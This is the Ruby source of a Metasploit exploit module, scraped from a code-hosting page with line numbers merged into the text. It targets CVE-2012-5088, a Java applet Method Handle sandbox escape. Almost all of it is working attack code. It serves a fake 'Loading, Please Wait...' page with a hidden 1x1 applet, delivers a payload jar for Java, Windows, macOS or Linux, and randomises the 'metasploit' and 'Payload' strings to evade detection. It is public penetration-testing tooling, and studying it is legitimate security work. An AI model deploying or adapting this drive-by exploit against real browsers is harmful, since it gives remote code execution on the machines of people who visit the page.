Path: blob/master/modules/exploits/multi/browser/java_jre17_method_handle.rb
31348 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpServer::HTML9include Msf::Exploit::EXE1011# include Msf::Exploit::Remote::BrowserAutopwn12# autopwn_info({ :javascript => false })1314def initialize(info = {})15super(16update_info(17info,18'Name' => 'Java Applet Method Handle Remote Code Execution',19'Description' => %q{20This module abuses the Method Handle class from a Java Applet to run arbitrary21Java code outside of the sandbox. The vulnerability affects Java version 7u7 and22earlier.23},24'License' => MSF_LICENSE,25'Author' => [26'Unknown', # Vulnerability discovery at security-explorations.com27'juan vazquez' # Metasploit module28],29'References' => [30[ 'CVE', '2012-5088' ],31[ 'OSVDB', '86352' ],32[ 'BID', '56057' ],33[ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-5.pdf' ],34[ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ]35],36'Payload' => { 'Space' => 20480, 'DisableNops' => true },37'Targets' => [38[39'Generic (Java Payload)',40{41'Platform' => ['java'],42'Arch' => ARCH_JAVA43}44],45[46'Windows x86 (Native Payload)',47{48'Platform' => 'win',49'Arch' => ARCH_X8650}51],52[53'Mac OS X x86 (Native Payload)',54{55'Platform' => 'osx',56'Arch' => ARCH_X8657}58],59[60'Linux x86 (Native Payload)',61{62'Platform' => 'linux',63'Arch' => ARCH_X8664}65],66],67'DefaultTarget' => 0,68'DisclosureDate' => '2012-10-16',69'Notes' => {70'Reliability' => UNKNOWN_RELIABILITY,71'Stability' => UNKNOWN_STABILITY,72'SideEffects' => UNKNOWN_SIDE_EFFECTS73}74)75)76end7778def setup79path = File.join(Msf::Config.data_directory, 'exploits', 'cve-2012-5088', 'Exploit.class')80@exploit_class = File.open(path, 'rb') { |fd| fd.read(fd.stat.size) }81path = File.join(Msf::Config.data_directory, 'exploits', 'cve-2012-5088', 'B.class')82@loader_class = File.open(path, 'rb') { |fd| fd.read(fd.stat.size) }8384@exploit_class_name = rand_text_alpha('Exploit'.length)85@exploit_class.gsub!('Exploit', @exploit_class_name)86super87end8889def on_request_uri(cli, request)90print_status("handling request for #{request.uri}")9192case request.uri93when /\.jar$/i94jar = payload.encoded_jar95jar.add_file("#{@exploit_class_name}.class", @exploit_class)96jar.add_file('B.class', @loader_class)97metasploit_str = rand_text_alpha('metasploit'.length)98payload_str = rand_text_alpha('payload'.length)99jar.entries.each do |entry|100entry.name.gsub!('metasploit', metasploit_str)101entry.name.gsub!('Payload', payload_str)102entry.data = entry.data.gsub('metasploit', metasploit_str)103entry.data = entry.data.gsub('Payload', payload_str)104end105jar.build_manifest106107send_response(cli, jar, { 'Content-Type' => 'application/octet-stream' })108when %r{/$}109payload = regenerate_payload(cli)110if !payload111print_error('Failed to generate the payload.')112send_not_found(cli)113return114end115send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })116else117send_redirect(cli, get_resource + '/', '')118end119end120121def generate_html122html = %(<html><head><title>Loading, Please Wait...</title></head>)123html += %(<body><center><p>Loading, Please Wait...</p></center>)124html += %(<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">)125html += %(</applet></body></html>)126return html127end128end129130131